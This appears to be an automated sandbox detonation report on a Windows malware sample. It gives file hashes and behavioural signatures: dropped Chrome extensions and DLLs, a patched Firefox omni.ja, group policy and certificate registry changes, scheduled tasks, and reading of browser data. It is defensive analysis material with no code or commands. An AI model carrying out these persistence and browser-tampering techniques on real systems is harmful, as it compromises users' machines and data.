C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\en\messages.json
| MD5 | 33292c7c04ba45e9630bb3d6c5cabf74 |
| SHA1 | 3482eb8038f429ad76340d3b0d6eea6db74e31bd |
| SHA256 | 9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249 |
| SHA512 | 2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\_locales\pt_BR\messages.json
| MD5 | 5c5a1426ff0c1128c1c6b8bc20ca29ac |
| SHA1 | 0e3540b647b488225c9967ff97afc66319102ccd |
| SHA256 | 5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839 |
| SHA512 | 1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4 |
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | 923e6b6c5fe6bc5e0feb4f68e8749de1 |
| SHA1 | 6b3dc8751c7f31c316bb1ac7b52609984d1c4acc |
| SHA256 | dc5882f19ceb28ea5b8ab9fe807547c167249eb81027ba0a419917466e53e49a |
| SHA512 | 4eda156b14a010fcf289a1921584fc53fd294e55ef502802733e1349624a675250d975084ff449b564533d7ba1073bae3f088820d7ed5ca9b6216e62f998c2d0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bnaebcjlolajbgllgjlmlfobobdemmki\3.8.26_0\_locales\es\messages.json
| MD5 | a14d4b287e82b0c724252d7060b6d9e9 |
| SHA1 | da9d3da2df385d48f607445803f5817f635cc52d |
| SHA256 | 1e16982fac30651f8214b23b6d81d451cc7dbb322eb1242ae40b0b9558345152 |
| SHA512 | 1c4d1d3d658d9619a52b75bad062a07f625078d9075af706aa0051c5f164540c0aa4dacfb1345112ac7fc6e4d560cc1ea2023735bcf68b81bf674bc2fb8123fb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | d59e59d70987cbf3eb8d34776f9aac62 |
| SHA1 | 705c6cb68764a72157361435fabed9d4f45dee37 |
| SHA256 | 76e4a80736de36c6ec852fb65fc70e711376a141c7c713fa1a51456c84ef8b40 |
| SHA512 | 9a3930726795ea8d73f62939a22cd2ce4bd53451ad755b8af953c559827d55cb5bbcda107efcb634b8abddbf8ade378d259f2b02c1102f1aac63c7ac3bff71b7 |
memory/964-1125-0x0000000000400000-0x0000000000D15000-memory.dmp
memory/2728-1128-0x0000000002F30000-0x0000000002FBA000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 38a3f91b6394a926f7c32c72e34c071e |
| SHA1 | 292ad29bb05d8e4f1a02fcf941d510269a0e1d70 |
| SHA256 | 08e44100e05f6775b9c96ca932b7ffd940e17620b146bf8b7900ae496c32959f |
| SHA512 | bf417f61e802f4f65e5f1b42e8aa5df1e2800b955f4886c33ac671df4c0e16a96a18ba25c92e2b93b3747af997e87cc580171e363ca5f655ac4f097c3f4aa469 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\onffaicf.default-release\prefs.js
| MD5 | 0c847470fe4242fe9d2bd61c2f81a422 |
| SHA1 | e34384b6216497f77e94c9a8e135fcc1413aadca |
| SHA256 | 66668ca875ff7174fe4f878b539f7215950827d49bb590b660557163a038ed7e |
| SHA512 | 97e0368ee1cfeada26a483a3aaf0d17d676686cf083f7c06d8f0414829fd85dc47e2222ae734711725bf3d847c1396441cf83aa5ace32cf4534dad30b0feb2e9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a77ec609c22853cc98dfaf525e7d75ff |
| SHA1 | 57784ca68d5daf26f5398c92a492c978035e2c33 |
| SHA256 | 606cc23ff372865333d028a148e89bc8109c299e4fd6a37386883abb2268deb6 |
| SHA512 | 30e4121b043a5f24e3618dd0ae73e1d8271f991bb58cb24f24bf6fc808f1c2fcc7f91d0a60579e7fded8d161562e67bbcabc2a297920e8f6e56feb3f68ee93df |
memory/2728-1142-0x0000000002FC0000-0x000000000308C000-memory.dmp
memory/4792-1197-0x0000000001280000-0x0000000001865000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 79a4409862f533a1bbd40b21afe0ce7e |
| SHA1 | b55194b947bca193d0b9375901720a65b9115226 |
| SHA256 | 9f49bbcfb758aa115519e2192503784cec3ef997cb655c1532bdb53834211c7b |
| SHA512 | 0a1ca28d8c837d019cb2bcdcad005c80c6231ce4b29649eb734e40d2b072b9d22ffbc3d83a317e2abda3549d888587251882df053ab4380f3f9eadff44f51c55 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0248f0322a10a8e1961ceb6a54378ebc |
| SHA1 | affa90500a7993089a4f8afa9a9c78bf2eb0d2ae |
| SHA256 | d376c2cab1a88ad8e93459cff1818d993095096a9a03e7133d8f6dd40874ac9c |
| SHA512 | cc23807a9fc73d9cae1134d29b785098badb9252b31e8e1a772429bfbe0fa3912ac64283ed5c447f4f56fe0715edbde1700f57f9a1402088b66410964c3b49fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e113076144adf3e86592b41275330ff7 |
| SHA1 | a6a809cc555a9a4dd485c8a1b47e05ec1268abfc |
| SHA256 | 6ba6dbadad2b0a292c8f780f97c05f7ec14d30939ededcd8a21ffa2ab9754760 |
| SHA512 | 527c10e424fbdb1bf8ac3ce9063c9e188b45a31eb49162a9becd2907961e4cc0238095db741401cd0fe63badc234a069aeef0b574a5cee9ce37527f8e88fa028 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 380e3d96f6ad1fd4b3fcdf1019c4a82b |
| SHA1 | 564e473ef9bcbb5cb60bc884189907db1a4bb73f |
| SHA256 | 906d6aba29066c903da1b09f6e28e6f6a416823c15041913fd0d57cad48219bf |
| SHA512 | 2517f80e9b6e30da67bdd3c08d9f9e6d428226dcc875c3343ae3ed22f86c300bc376c3f64cbb55f1773348424f3af6c48637671f577adead3952507ba252dbbe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | dc5c8900eb13278815edcc757788597b |
| SHA1 | bc4d39ae57732c3867db89077a1a907d9e918082 |
| SHA256 | 4f09b851d4e3818d837a7bff9c12ec1a18510bb130e3be9ff7287b1f1e6006f8 |
| SHA512 | b5ae4b7726a4523aab55da0e159793a2bb298f5df815467976a7341f6aa99a3580c085e1e4cda62190c0e4704cc98c736fd4cf3e06eb39808b5594957e7c3408 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8f93a2370966bd5488774269635ab440 |
| SHA1 | 1643cfda17f62365c5b4322ac6bf06c0c2baaf0e |
| SHA256 | 05b3795b15744b145098b247b05c820e90015ffebd4982ce9ae34371adffa074 |
| SHA512 | 98eae70d54300d0b199dd0714bfea1df52acaff3fe638a2e16fc27f91eda18983b28dda13667ace3dfb4ec486bbcab4ce72734fcd0d630d6fd23c0e513f36e58 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-14 17:56
Reported
2024-07-14 18:01
Platform
win11-20240709-en
Max time kernel
300s
Max time network
301s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\mlDSpAv.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\XoErYOe.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files (x86)\ezMWJXFFLyUn\UwKjjcK.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\ULWxyeQ.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\ufPzTSh.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\dAvQqI.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\qdrADvEQqqeIm.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\oFBZBqb.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\cxgOVhs.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\OcPshDNvhDnVmSv.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\MRTHivZIQsRdEanwm.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b1167767-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\kNdTnAP.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
